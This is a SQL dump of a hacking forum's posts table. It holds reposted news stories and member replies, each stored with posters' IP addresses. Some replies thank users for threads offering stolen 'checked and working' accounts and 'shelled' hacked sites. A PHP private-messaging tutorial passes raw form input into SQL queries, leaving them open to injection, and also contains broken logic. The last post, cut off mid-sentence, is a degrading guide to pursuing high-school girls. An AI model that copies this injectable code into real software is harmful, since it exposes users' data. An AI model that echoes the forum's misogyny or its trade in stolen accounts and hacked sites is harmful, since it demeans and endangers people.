rubies.\r\n\r\n\"One time only she will appear at the bunny ranch and give up her virginity to the highest bidder,\" says the brothel\'s Web site in a needlessly repetitive statement. Dylan says she is trying to finance graduate studies for her sister and herself.\r\n\r\nSome legal experts say they\'re well within their rights to make the sale.\r\n\r\n\"It\'s a First Amendment issue. You can advertise goods or services that are illegal where they\'re advertised but legal where they\'re performed,\" said Marc Randazza, an attorney specializing in first amendment law. \"What\'s she\'s advertising is as legal as toast with the crust cut off where she is.\"\r\n\r\nRandazza said some prosecutors might be eager to jump on the case, but that this \"commercial speech\" is protected.\r\n\r\n\"If this is legal where it\'s being advertised\" — in Nevada — \"the government can\'t say you can\'t advertise it here,\" he told FOXNews.com.\r\n\r\n(Source): http://www.foxnews.com/story/0,2933,480037,00.html', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'f4176307a8b335fef802fc2836183f15', '0', '0'); INSERT INTO mybb_posts VALUES('6542', '1125', '0', '42', 'Death by Monster energy drink', '0', '264', 'D?ea', '1351440285', 'Reuters) - The Food and Drug Administration said on Monday that it was investigating reports of five deaths that may be associated with Monster Beverage Corp\'s namesake energy drink, and the company\'s shares fell more than 14 percent.\r\n \r\nMonster is also being sued by the family of a 14-year-old Maryland girl with a heart condition who died after drinking two cans of its Monster energy drink in a 24-hour period.\r\n \r\nMonster said it does not believe its drinks are \"in any way responsible\" for the girl\'s death.\r\n \r\nThe energy drink market is dominated by Monster and Austrian company Red Bull, but it also includes beverages made by Coca-Cola Co and PepsiCo.\r\n \r\nThe lawsuit and reports of other deaths that may be associated with energy drinks illustrate safety concerns surrounding the highly caffeinated beverages that are especially popular with young people. They could also embolden the industry\'s critics, including two senators and the New York attorney general.\r\n \r\n\"I don\'t think they are going to ban energy drinks,\" said Morningstar analyst Thomas Mullarkey. \"The question arises whether or not it gives them more firepower for increased regulation.\"\r\n \r\nThat could mean more extensive labeling requirements or age restrictions, Mullarkey said. He added that the negative headlines also made Monster a less attractive takeover target.\r\n \r\n\"This really reduces the likelihood that Coke would want to acquire Monster,\" Mullarkey said. Sources told Reuters in April that the two companies had discussed a possible deal as recently as last year.\r\n \r\nCONCERNS NOT NEW\r\n \r\nThe family of Anais Fournier sued Monster on Friday for failing to warn about the product\'s dangers.\r\n \r\nThe lawsuit, filed in California Superior Court in Riverside, said that after drinking two 24-ounce cans of Monster Energy on consecutive days Fournier went into cardiac arrest. She was placed in an induced coma and died six days later on December 23, 2011.\r\n \r\nThe lawsuit said Fournier died from \"cardiac arrhythmia due to caffeine toxicity\" that complicated an existing heart valve condition related to a disorder called Ehlers-Danlos syndrome.\r\n \r\nThe two drinks together contained 480 milligrams of caffeine, the equivalent of 14 12-ounce cans of Coca-Cola, according to the lawsuit.\r\n \r\n\"Monster is unaware of any fatality anywhere that has been caused by its drinks,\" the company said in a statement, adding that it intended to vigorously defend itself against the lawsuit.\r\n \r\nOn Monday, FDA spokeswoman Shelly Burgess said the agency had received reports of five deaths and one heart attack that may be associated with the Monster energy drink from 2009 through June this year.\r\n \r\nThe FDA said it investigates any report of injury or death that it receives. The notices to the FDA\'s adverse events database do not in themselves confirm a risk from a product.\r\n \r\nBurgess said manufacturers are required to submit all reports on serious adverse events to the FDA within 15 days of receiving them, and that they are responsible for providing follow-up information that could shed light on their cause.\r\n \r\nLast month, Senators Dick Durbin of Illinois and Richard Blumenthal of Connecticut sent a letter to the FDA asking it to investigate the interaction of ingredients in energy drinks and the effect of the caffeine on children and adolescents. The letter followed a similar request from Durbin in April.\r\n \r\nIn July, New York Attorney General Eric Schneiderman issued subpoenas to three energy drink makers -- Monster, PepsiCo and Living Essentials LLC -- seeking information on the companies\' marketing and advertising practices. PepsiCo makes the AMP energy drink, and Living Essentials makes 5-Hour Energy.\r\n \r\nThe combination of caffeine and alcohol came into the spotlight two years ago when a handful of college students were hospitalized for alcohol poisoning after drinking alcoholic energy drinks like Four Loko. Four Loko\'s maker later removed the caffeine from the drinks.\r\n \r\nMonster is the leading U.S. energy drink by volume with nearly 39 percent of the U.S. market, but Austria\'s Red Bull has the highest share by revenue due to its premium price.\r\n \r\nMonster Energy drinks are sold in the United States and Europe, and the company is rolling them out to Ecuador, Hong Kong, Japan, Macau and Slovenia. It said in August that it was planning more international launches next year.\r\n \r\nThe company had net sales of $592.6 million in the second quarter, ended on June 30.\r\n \r\nMonster shares closed down 14.23 percent at $45.73 on the Nasdaq.\r\n \r\nThe case is Crossland et al v. Monster Beverage Corp, California Superior Court, Riverside County, No. RIC1215551.\r\n \r\n\r\n\r\nLink: http://www.reuters.com/article/2012/10/2...6G20121022', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '35cabea733fe99bf8dab24d72d88dd5c', '0', '0'); INSERT INTO mybb_posts VALUES('6543', '1126', '0', '42', 'Facebook spent $715M on Instagram, $87M on other acquisitions this year', '0', '264', 'D?ea', '1351440704', 'Facebook spent $87 million so far this year on business acquisitions not including its Instagram purchase, the company revealed in a filing with the Securities and Exchange Commission today.\r\n\r\nFacebook spent $521 million on Instagram — $300 million of which was in cash, the rest in vested shares of Class B common stock. Facebook additionally issued 11 million unvested shares to employee stockholders of Instagram, with a value of about $194 million to be recognized as they vest over three years. This makes the total price of the mobile photo sharing app $715 million, shy of the $1 billion original price, which decreased with Facebook’s stock value.\r\n\r\n[img]http://www.insidefacebook.com/wp-content/uploads/2012/10/facebook_logo1.png[/img]\r\n\r\nFacebook reported $87 million in other business acquisitions from Jan. 1 to Sept. 30. Apart from Instagram, this year Facebook has bought Tagtile, Glancee, Karma, Face.com and Threadsy.\r\n\r\nTagtile was a mobile-based customer loyalty management startup that offered payments hardware and software for merchants. Glancee was an ambient mobile location app that alerts users when people with similar interests are nearby. Karma was a mobile gifting and commerce service, which was turned into Facebook Gifts. Face.com was a facial recognition technology company. Threadsy offered a Klout-like service called Swaylo to connect brands and influencers, and help users understand their own influence on Facebook.\r\n\r\nFacebook also made a number of acqu-hires this year, picking up employees from Momentus Media, Lightbox, Bolt Peters, Pieceable Software, Spool, Acrylic and Carsabi.\r\n\r\nThe company only spent $24 million on acquisitions at the end of Q2, indicating that the most recent acquisitions to close added up to $63 million. Facebook did not include details about the price of each deal or when they closed.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'ca9185a0abe9357781f3cd72f475a2f6', '0', '0'); INSERT INTO mybb_posts VALUES('6544', '1127', '0', '42', 'Up to 100 Hackers to be offered a Job at MI5 or MI6', '0', '264', 'D?ea', '1351440836', 'Source: http://www.bbc.co.uk/news/uk-politics-19993921\r\n\r\n[code]\r\nUp to 100 members of \"generation Xbox\" will be offered a career in the secret services, under a scheme announced by Foreign Secretary William Hague.\r\n\r\nThe recruitment drive was aimed at \"the young innovators of this generation who will help keep our country safe in years to come\", Mr Hague said.\r\n\r\nThe 18-year-olds will be trained in advanced IT skills and then expected to work on tackling cybercrime.\r\n\r\nTheir task was \"every bit as serious\" as conventional warfare, Mr Hague said.\r\n\r\nSpeaking at Bletchley Park, the home of Britain\'s Second World War codebreakers, the foreign secretary said: \"Today we are not at war, but I see evidence every day of deliberate, organised attacks against intellectual property and government networks in the United Kingdom from cyber criminals or foreign actors with the potential to undermine our security and economic competitiveness.\r\n\r\n\"This is one of the great challenges of our time, and we must confront it to ensure that Britain remains a world leader in cyber security and a pre-eminent safe space for e-commerce and intellectual property online.\"\r\n\'Slightly naughty\'\r\n\r\nSuccessful applicants to the Single Intelligence Account apprenticeship will pursue a foundation degree course in communications, security and engineering over two years at De Montfort University in Leicester.\r\n\r\nThey will also study for a level 4 diploma in IT, software, web and telecommunications professional competence, and will be expected to work predominantly at GCHQ, the electronic communications agency - although some will go on to work for MI5, the security service, or MI6 intelligence agency.\r\n\r\nMr Hague also used his visit to announce a boost in funding for the preservation of Bletchley Park, the forerunner to GCHQ.\r\n\r\nThe cyber security minister in the previous Labour government, Lord West, said in 2009 that the government had recruited a team of former hackers for its new Cyber Security Operations Centre, based at GCHQ in Cheltenham.\r\n\r\nThey had not employed any \"ultra, ultra criminals\" but needed the expertise of former \"naughty boys\", he told BBC Radio 4\'s PM programme.\r\n\r\n\"You need youngsters who are deep into this stuff... If they have been slightly naughty boys, very often they really enjoy stopping other naughty boys,\" he said.\r\n[/code]\r\n\r\n[i]What do you guys think?[/i]', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'e7cc7f63c93af6213c00b183c1506280', '0', '0'); INSERT INTO mybb_posts VALUES('6545', '1113', '6476', '54', 'RE: [27 0ct]huge collection of premium porn acounts. all checked and working', '0', '1', 't3h jok3r', '1351444965', 'Thanks, how do you get so many accounts so easily?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3758fcbbd32b394cbeedcc3862fa1b66', '0', '0'); INSERT INTO mybb_posts VALUES('6547', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '82', 'iTzIpod', '1351456887', '2 Payouts from members of LH right? Hopefully.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '66376bff7180127ca15a28b60a66ba09', '0', '0'); INSERT INTO mybb_posts VALUES('6548', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '82', 'iTzIpod', '1351456919', '10/10 because I love Anime. ;)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd57d4363bf348bde8d73e218d18ff7cf', '0', '0'); INSERT INTO mybb_posts VALUES('6549', '1124', '6541', '42', 'RE: 22-Year-Old Girl Sells Her Virginity Online', '0', '82', 'iTzIpod', '1351457019', 'I remember that there once was a man selling his virginity online and the bid was like $7,000,000+\nHe was a body builder.\n\nI may be wrong. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ba330ecc1f32175b04571ada33e7fb77', '0', '0'); INSERT INTO mybb_posts VALUES('6550', '1125', '6542', '42', 'RE: Death by Monster energy drink', '0', '82', 'iTzIpod', '1351457095', 'I heard about this tragic event on Tuesday. It could\'ve been because the girl had very bad health. Either or on the Monster drink, it says that you should not consume x amount in x duration.\nSo they should not get sued. If I\'m not mistaken of course.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2c60fe54ffb60914840c3860ad82734e', '0', '0'); INSERT INTO mybb_posts VALUES('6551', '1115', '6479', '49', 'RE: Update the logo....', '0', '82', 'iTzIpod', '1351457152', 'Should this thread be closed now? :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bd2ac8276848e09fde0fd0dff188ac16', '0', '0'); INSERT INTO mybb_posts VALUES('6552', '1115', '6479', '49', 'RE: Update the logo....', '0', '222', 'Exposé', '1351459722', 'Jok3r just switch it with this...moved it up a bit..\n\n[IMG]http://i.imgur.com/6Q9M7.png[/IMG]', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'e3d6e8473101b2460dc74291d2f75919', '0', '0'); INSERT INTO mybb_posts VALUES('6553', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '222', 'Exposé', '1351459832', '8/10 because I used to like pokemon and its original :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '94734247a286e6c0efa6c47ebbc79582', '0', '0'); INSERT INTO mybb_posts VALUES('6554', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '5', 'Timmy', '1351462577', '10/10 because he made the halloween logo.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8c272f6f73e53f1a3a9b2dfdc34fa6bf', '0', '0'); INSERT INTO mybb_posts VALUES('6555', '1115', '6479', '49', 'RE: Update the logo....', '0', '5', 'Timmy', '1351462624', 'Thread should be closed now.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '92c043f82a9c5018550a281932775252', '0', '0'); INSERT INTO mybb_posts VALUES('6556', '1127', '6544', '42', 'RE: Up to 100 Hackers to be offered a Job at MI5 or MI6', '0', '5', 'Timmy', '1351462832', 'That\'s great but they might fuck some over.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '40f70f8c1a94636ef2d1841039815d2b', '0', '0'); INSERT INTO mybb_posts VALUES('6557', '1125', '6542', '42', 'RE: Death by Monster energy drink', '0', '5', 'Timmy', '1351462885', 'Damn that sucks. They should ban Monster Energy and investigate.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8b86517feb8a6ab19d5a50eafd2327a1', '0', '0'); INSERT INTO mybb_posts VALUES('6558', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '5', 'Timmy', '1351463134', 'Nice idea. Thanks for making a L33T Hacking minecraft server.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'dfcb8ebd892209635a8b6b7dd481f61c', '0', '0'); INSERT INTO mybb_posts VALUES('6559', '1074', '6244', '84', 'RE: [NEW] App Trailers Exploit [HOT!]', '0', '5', 'Timmy', '1351463559', 'Lol yeah he is smart and thanks.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4833d64180fe73e84bdbd342168d43a8', '0', '0'); INSERT INTO mybb_posts VALUES('6560', '281', '1335', '84', 'RE: Upload N Sell Exploit', '0', '5', 'Timmy', '1351463634', 'Thanks this is very useful but the problem is that you can only get one code per day.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'e8fd15c5b892cd715a10b9e1696e0143', '0', '0'); INSERT INTO mybb_posts VALUES('6561', '1080', '6270', '13', 'RE: [FREASH] 4 ASP shelled sites!!!![hacked]', '0', '9', 'p420', '1351463824', 'Thanks for the shelled sites. Needed these for something.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '84863e0c65a69b630cb16aca3fb6e9d9', '0', '0'); INSERT INTO mybb_posts VALUES('6562', '1128', '0', '67', '[TuT] Creating a PM system', '0', '9', 'p420', '1351465127', 'Several people ion the PHP section have asked about how to make a Private Messaging system, whether for a game, forum, Etc. Private Messaging is extremely simple to set up, and I will show it here.\r\n\r\n\r\nok, since we need to connect to the Database on each page, i\'ve created one called \"config.php\".\r\n\r\n[php]\r\n<?php\r\n$localhost = \"$localhost\";\r\n$mysqlusername = \"$mysqlusername\";\r\n$mysqlpassword = \"$mysqlpassword\";\r\n$db = \"$db\";\r\n$con = mysql_connect($localhost, $mysqlusername, $mysqlpassword);\r\nmysql_select_db(\"$db\", $con);\r\n?>\r\n[/php]\r\n\r\nFirst off, we need to create a table called \"messages\" in the DB we have selected. it will have the columns \"to_user\", \"message\", and \"from_user\", \"sent_deleted\", and \"deleted\". \"sent_deleted\" is for a user to delete the PM after they have sent it, whereas \"deleted\" tells us that the pm has been deleted by the receiver. Neither of the last two are necessary, but I like to keep them in the table for reference.\r\n\r\n\r\n[php]<?php\r\n//Connect to the Database\r\nrequire(\"config.php\");\r\n//query to create the Table\r\nmysql_query(\"CREATE TABLE messages(\r\nto_user VARCHAR(30),\r\nfrom_user VARCHAR(30),\r\ndeleted VARCHAR(3) DEFAULT no,\r\nsent_deleted VARCHAR(3) DEFAULT no,\r\nmessage VARCHAR(1000))\")\r\nor die(mysql_error()); \r\n\r\necho \"Table Created!\";\r\n\r\n?>\r\n[/php]\r\n\r\nSecondly, we need to create a form to add the message into the database. I call this \"sendpm.php\".\r\n\r\n[php]\r\n<?php \r\nsession_start();\r\nrequire(\"config.php\");\r\n\r\n$message = $_POST[\'forward2\'];\r\nif (isset($_POST[\'submit\']))\r\n{\r\n// if the form has been submitted, this inserts it into the Database\r\n $to_user = $_POST[\'to_user\'];\r\n $from_user = $_POST[\'from_user\'];\r\n $message = $_POST[\'message\'];\r\n mysql_query(\"INSERT INTO messages (to_user, message, from_user) VALUES (\'$to_user\', \'$message\', \'$from_user\')\")or die(mysql_error());\r\n echo \"PM succesfully sent!\";\r\n}\r\nelse\r\n{\r\n // if the form has not been submitted, this will show the form\r\n?>\r\n<form action=\"<?php echo $_SERVER[\'PHP_SELF\']?>\" method=\"post\">\r\n<table border=\"0\">\r\n<tr><td colspan=2><h3>Send PM:</h3></td></tr>\r\n<tr><td></td><td>\r\n<input type=\"hidden\" name=\"from_user\" maxlength=\"32\" value = <?php echo $_SESSION[\'username\']; ?>>\r\n</td></tr>\r\n<tr><td>To User: </td><td>\r\n<input type=\"text\" name=\"to_user\" maxlength=\"32\" value = \"\">\r\n</td></tr>\r\n<tr><td>Message: </td><td>\r\n<TEXTAREA NAME=\"message\" COLS=50 ROWS=10 WRAP=SOFT></TEXTAREA>\r\n</td></tr>\r\n<tr><td colspan=\"2\" align=\"right\">\r\n<input type=\"submit\" name=\"submit\" value=\"Send Message\">\r\n</td></tr>\r\n</table>\r\n</form>\r\n<?php\r\n}\r\n?>\r\n[/php]\r\n\r\nI also decided to make an outbox, so users can view PMs they have sent.\r\n\r\n[php]\r\n<?php \r\nsession_start();\r\nrequire(\"config.php\");\r\n\r\n$user = $_SESSION[\'username\'];\r\nif (isset($_POST[\'delete\'])) {\r\n $id = $_POST[\'id\']; \r\n mysql_query(\"UPDATE messages SET sent_deleted = \'yes\' WHERE from_user = \'$user\' AND id = \'$id\'\")or die(mysql_error());\r\n echo \"Message succesfully deleted from your outbox.\";\r\n}\r\n$user = $_SESSION[\'user\'];\r\n$sql = mysql_query(\"SELECT * FROM messages WHERE from_user = \'$user\' AND sent_deleted = \'no\'\")or die(mysql_error());\r\n\r\nwhile($row = mysql_fetch_array( $sql ))\r\n{\r\n/* I have set each element into it\'s OWN echo statement for easy readind.\r\nhowever it is possible to create it in one echo statement like the following:\r\necho \"Message ID#: \".$row[\'id\'];\r\n*/\r\n echo \"<table border=1>\";\r\n echo \"<tr><td>\";\r\n echo \"Message ID#: \";\r\n echo $row[\'id\'];\r\n echo \"</td></tr>\";\r\n echo \"<tr><td>\";\r\n echo \"To: \";\r\n echo $row[\'to_user\'];\r\n echo \"</td></tr>\";\r\n echo \"<tr><td>\";\r\n echo \"From: \";\r\n echo $row[\'from_user\'];\r\n echo \"</td></tr>\";\r\n echo \"<tr><td>\";\r\n echo \"Message: \";\r\n echo $row[message];\r\n echo \"</td></tr>\";\r\n echo \"</br>\";\r\n?>\r\n\r\n<form action=\"<?php echo $_SERVER[\'PHP_SELF\']?>\" method=\"post\">\r\n<table border=\"0\">\r\n<tr><td colspan=2></td></tr>\r\n<tr><td></td><td>\r\n<input type=\"hidden\" name=\"id\" maxlength=\"5\" value = \"<?php echo $row[\'id\']; ?>\">\r\n</td></tr>\r\n<tr><td colspan=\"2\" align=\"right\">\r\n<input type=\"submit\" name=\"delete\" value=\"Delete PM # <?php echo $row[\'id\']; ?> from outbox\">\r\n</td></tr>\r\n</table>\r\n</form>\r\n\r\n<?php\r\n}\r\n echo \"</table>\";\r\n echo \"</br>\";\r\n?>\r\n[/php]\r\n\r\nLastly, we need the actual inbox, where users can view Private Messages that have been sent to them.\r\n\r\n[php]\r\n<?php\r\nsession_start();\r\nrequire(\"config.php\");\r\n\r\n$user = $_SESSION[\'user\'];\r\n\r\nif (isset($_POST[\'view_old\'])) {\r\n$user = $_SESSION[\'user\'];\r\n$query = mysql_query(\"SELECT * FROM messages WHERE to_user = \'$user\' AND deleted = \'no\'\")or die(mysql_error());\r\nwhile($row2 = mysql_fetch_array($query))\r\n{\r\n echo \"<table border=1>\";\r\n echo \"<tr><td>\";\r\n echo \"Message ID#: \";\r\n echo $row2[\'id\'];\r\n echo \"</td></tr>\";\r\n echo \"<tr><td>\";\r\n echo \"To: \";\r\n echo $row2[\'to_user\'];\r\n echo \"</td></tr>\";\r\n echo \"<tr><td>\";\r\n echo \"From: \";\r\n echo $row2[\'from_user\'];\r\n echo \" \";\r\n echo \"</td></tr>\";\r\n echo \"<tr><td>\";\r\n echo \"Message: \";\r\n echo bb ($row2[\'message\']);\r\n echo \"</td></tr>\";\r\n echo \"</br>\";\r\n?>\r\n<form action=\"<?php echo $_SERVER[\'PHP_SELF\']?>\" method=\"post\">\r\n<table border=\"0\">\r\n<tr><td colspan=2></td></tr>\r\n<tr><td></td><td>\r\n<input type=\"hidden\" name=\"id\" maxlength=\"32\" value = \"<?php echo $row2[\'id\']; ?>\">\r\n</td></tr>\r\n<tr><td colspan=\"2\" align=\"right\">\r\n<input type=\"submit\" name=\"delete\" value=\"Delete PM # <?php echo $row2[\'id\']; ?>\">\r\n</td></tr>\r\n</table>\r\n</form>\r\n<?php\r\n}\r\n}\r\n\r\nif (isset($_POST[\'delete\'])) {\r\n$id = $_POST[\'id\'];\r\n$user = $_SESSION[\'username\'];\r\n$sql = mysql_query(\"UPDATE messages SET deleted = \'yes\' WHERE id = \'$id\' AND to_user = \'$user\'\")or die(mysql_error());\r\necho \"Your message has been succesfully deleted.\";\r\n}\r\n\r\n\r\nwhile($row = mysql_fetch_array($sql))\r\n{\r\n$user = $_SESSION[\'user\'];\r\n echo \"<table border=1>\";\r\n echo \"<tr><td>\";\r\n echo \"Message ID#: \";\r\n echo $row[id];\r\n echo \"</td></tr>\";\r\n echo \"<tr><td>\";\r\n echo \"To: \";\r\n echo $row[to_user];\r\n echo \"</td></tr>\";\r\n echo \"<tr><td>\";\r\n echo \"From: \";\r\n echo $row[from_user];\r\n echo \"</td></tr>\";\r\n echo \"<tr><td>\";\r\n echo \"Message: \";\r\n echo $row[message];\r\n echo \"</td></tr>\";\r\n echo \"</br>\";\r\n mysql_query(\"UPDATE messages SET read_yet = \'yes\' WHERE to_user = \'$user\' AND id =\'$row_id\'\")or die(mysql_error());\r\n?>\r\n\r\n<form action=\"<?php echo $_SERVER[\'PHP_SELF\']?>\" method=\"post\">\r\n<table border=\"0\">\r\n<tr><td colspan=2></td></tr>\r\n<tr><td></td><td>\r\n<input type=\"hidden\" name=\"id\" maxlength=\"32\" value = \"<?php echo $row[\'id\']; ?>\">\r\n</td></tr>\r\n<tr><td colspan=\"2\" align=\"right\">\r\n<input type=\"submit\" name=\"delete\" value=\"Delete PM # <?php echo $row[\'id\']; ?>\">\r\n</td></tr>\r\n</table>\r\n</form>\r\n\r\n<?\r\n\r\n}\r\necho \"</table>\";\r\n?>\r\n[/php]\r\n\r\n(NOTE: this is an extremely simple PM system with NO security against SQL Injection. If you wish to prevent SQL Injection, I suggest you read some tutorials.)', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '0968757932b46044a09281d146292a04', '0', '0'); INSERT INTO mybb_posts VALUES('6563', '1102', '6412', '69', 'RE: What kinds of programs have you coded before', '0', '67', 'HoverCatz', '1351465333', '[b]Spotify[/b] (Vb.net)\n[b]Facebook[/b] (Html, Css)\n[b]Copy of hf[/b] (Html, css) [i](Working, not giving it out)[/i]\n[b]Minecraft 2d[/b] (Java)', '178.74.57.144', '-1303758448', '1', '0', '67', '1351465346', '1', 'd9d702855487ad6c7f58497c0c991b42', '0', '1351465346'); INSERT INTO mybb_posts VALUES('6564', '1102', '6412', '69', 'RE: What kinds of programs have you coded before', '0', '2', 'Apathy', '1351471896', 'I made calculators, for the most part I pay someone to code me whatever I want. :P', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', 'c0e4f724b344be0654ab31a7af7a513f', '0', '0'); INSERT INTO mybb_posts VALUES('6565', '1128', '6562', '67', 'RE: [TuT] Creating a PM system', '0', '2', 'Apathy', '1351471928', 'Looks like a nice tutorial! Thanks for the share.', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', 'bf07b5c1ea0f6f48796456daaff70430', '0', '0'); INSERT INTO mybb_posts VALUES('6566', '1074', '6244', '84', 'RE: [NEW] App Trailers Exploit [HOT!]', '0', '2', 'Apathy', '1351472106', 'Lol Already knew this method as I thought of it myself. To bad now it is going to get ruined. Nice share none the less.', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', '6359f520cf2944e1681578ff0bc3acf2', '0', '0'); INSERT INTO mybb_posts VALUES('6567', '656', '3267', '8', 'RE: why do ppl like this shitty song!?!?', '0', '262', 'RAND0M1ZER', '1351476053', 'lol, well at least you found some like minded people here on the forums. I\'m not a fan of it either.', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', '3ee115ef93b579d92de7a8c55ddde24e', '0', '0'); INSERT INTO mybb_posts VALUES('6568', '1129', '0', '65', 'How do you watch your digital content', '0', '262', 'RAND0M1ZER', '1351476233', 'I was wondering what everyone did with their digital movies, shows, music, etc.\r\n\r\nIn the past I had a huge binder of DVDs that I had burned or copied from various sources but now I\'ve moved on to a file server which I use to host all my files and then stream them across my house.\r\n\r\nNetflix is also getting pretty popular, but here in Canada I think my option is better.', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', '5281d8d5040028408e62e66f037c2da2', '0', '0'); INSERT INTO mybb_posts VALUES('6569', '868', '4710', '71', 'RE: whats the best COD', '0', '262', 'RAND0M1ZER', '1351476720', 'Cod4 (the original MW) hands down. After that they just added too much BS to the game I found.', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', '19ddc360a1fa38835d638f676835ba83', '0', '0'); INSERT INTO mybb_posts VALUES('6570', '868', '4710', '71', 'RE: whats the best COD', '0', '82', 'iTzIpod', '1351480335', 'CoD Black Ops in my opinion <3\n\nMaybe then, MW2 :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '671d5d32e814f3073e4f0a906b8f5473', '0', '0'); INSERT INTO mybb_posts VALUES('6571', '1130', '0', '83', '[Videos] Dancing with girls [Text tips included]', '0', '4', 'Triple H', '1351480386', 'If there\'s a dance party at school or somewhere it\'s better to go there with a couple of guy friends that can help you if you get into fights etc.\r\n\r\nIf possible go with a girl or girls so you have someone to dance with, if not then go with some buddies and get some girl on the floor.\r\n\r\n[b]Dirty Dance moves[/b]\r\n\r\n[video=youtube]http://www.youtube.com/watch?v=uPrHAHWNN5o[/video]\r\n\r\n[b]Dirty dos and don\'ts[/b]\r\n\r\n[video=youtube]http://www.youtube.com/watch?v=l3rLk1Np9vA[/video]\r\n\r\nNow if you are tired don\'t dance alone, take a few mins break and go sit down somewhere and look around for some girl.\r\n\r\nIf a girl is standing and dancing then go near her and dance but make her think that you understand her moves. If she is sitting then she won\'t dance but if she is just standing then ask her. If she gets too close then take her in the corner not to kiss or anything but for a bit more open dance.\r\n\r\nThere would always be a group somewhere around, if you are alone for a few mins or some shit then go in the group and show your best moves.\r\n\r\nNever stick with the same girl for too long.\r\n\r\n[b]Ghetto Bounce[/b]\r\n\r\n[video=youtube]http://www.youtube.com/watch?v=QJ7zA1QqjY4[/video]\r\n\r\n[b]Dance in club by Howcast[/b]\r\n\r\n[video=youtube]http://www.youtube.com/watch?v=9HgmhjvhX7o[/video]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a8095bdd532955d1a57a467fb5724519', '0', '0'); INSERT INTO mybb_posts VALUES('6572', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '82', 'iTzIpod', '1351480411', 'We\'re discussing it not making it :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '49a6b4b5d1185a14cfc8aae2840a9ee1', '0', '0'); INSERT INTO mybb_posts VALUES('6573', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '82', 'iTzIpod', '1351480511', '11/10\nI love it. :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3ae86d01cbc9ca3a7d4907ac286bd539', '0', '0'); INSERT INTO mybb_posts VALUES('6574', '1130', '6571', '83', 'RE: [Videos] Dancing with girls [Text tips included]', '0', '82', 'iTzIpod', '1351480609', 'Oo. I like how you added videos for a better visual and understanding! :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6e2322376f490996061ec5c6830efadd', '0', '0'); INSERT INTO mybb_posts VALUES('6575', '1131', '0', '83', '[Guide] Bagging whores in High School', '0', '4', 'Triple H', '1351481714', 'This guide shows how to bag whores in high school.\r\n\r\n[b]Requirements[/b]\r\n[list]\r\n[*] A phone with texting plan or BBM\r\n[*] Expensive clothing such as ralph lauren, american eagle etc\r\n[*] Time AFTER school\r\n[*] Sophomore or higher recommended \r\n[/list]\r\n\r\n[b]Step 1[/b]\r\nFind a cute girl walking around going to her next class or sitting in lunch but not a decent one. She must be someone who engages in conversations, open-minded, not wearing tooo many layers of clothing etc. Be careful, don\'t run up to her or block her way. It\'s recommended to be around her shoulder and don\'t stop her while she is walking or something. When you say something DO NOT LAUGH, keep a normal simile.\r\n\r\n[b]Step 2[/b]\r\n\r\nGo up to her and say \"What\'s up\". If she says what\'s up back then ask her name. If she doesn\'t say what\'s up back and replies back saying something like nothing much or hi then say \"hey what\'s your name?\"\r\n\r\nIf she replies with the name\r\n\r\n[spoiler]\r\nTell her what your name is. Then ask her what grade she is in. If she is going to her next class then escort her to the class. If there\'s time then ask her who the teacher is and does she like the class or not. Shut up after that.\r\n\r\nMeet her again the next day and be like what\'s up and ask her how she is today. Ask her if she has facebook or ask her if she likes texting. If she likes texting then give her your number.\r\n[/spoiler]\r\n\r\nIf she doesn\'t reply with the name\r\n\r\n[spoiler]\r\n\r\nShe will most likely ask why. Reply by saying you find her cute and would like to get to know her more. If she still doesn\'t talk then ask if you don\'t mind can you drop her off to her next class. If yes then on the way ask her what grade she is in etc then at the door ask the name again and tell your name.\r\n\r\nMeet her again the next day and be like what\'s up and ask her how she is then ask about what subject she has next and does she like the teacher or not. After that leave after saying bye even if you weren\'t by the class door it\'s cool.\r\n\r\nThe third day try talking to her and crack a joke then ask her for her number or give your number.\r\n[/spoiler]\r\n\r\nIf you take her number then ask her what time can you text her. Try avoiding the school timing for the first few days.\r\n\r\nChat with her, talk her out to places or cut classes and walk with her etc. Get to know her more, tease her but don\'t cross the limit. Hug her when you meet her, be friendly.\r\n\r\nAfter a week or two ask her out. Remember she is a whore not some decent girl that you need to get to know her for 5 years.\r\n\r\nWhen you ask her out say this \"I find you cute, would you be my girl?\" (Asking her to be your GF without going out) OR \"I find you cute so would you go out with me?\" (Going on a date)\r\n\r\nIf she says yes then kiss her on the lip, if not then say damn (not too loud) then smile. Say \"aight umm no problem, see ya 